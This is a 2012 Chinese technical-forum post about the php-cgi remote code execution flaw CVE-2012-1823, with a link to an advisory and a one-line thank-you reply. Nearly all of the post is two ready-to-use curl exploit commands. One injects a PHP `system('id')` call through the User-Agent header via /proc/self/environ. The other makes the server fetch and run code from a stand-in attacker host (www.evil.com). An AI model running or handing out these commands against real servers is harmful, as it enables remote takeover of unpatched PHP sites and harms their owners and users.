设为首页收藏本站
开启辅助访问 切换到宽版

天空小小岛技术论坛

 找回密码
 注册
搜索
天空小小岛技术网站»论坛 语言学习 PHP php-cgi远程代码执行
返回列表 发新帖
查看: 9187|回复: 1
打印 上一主题 下一主题

[其他] php-cgi远程代码执行

[复制链接]
跳转到指定楼层
1#
s.Bo 发表于 2012-5-4 14:49:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

1、本地包含直接执行代码:
  1. curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
复制代码
2、远程包含执行代码:
  1. curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt
复制代码
回复

使用道具 举报

2#
kk7769640 发表于 2012-9-23 13:50:24 | 只看该作者
楼主太厉害了,谢谢分享!
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|天空小小岛  |京ICP备2025130156号|

GMT+8, 2025-6-21 19:11 , Processed in 0.090765 second(s), 19 queries , Gzip On.

Powered by Discuz! X3.1

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表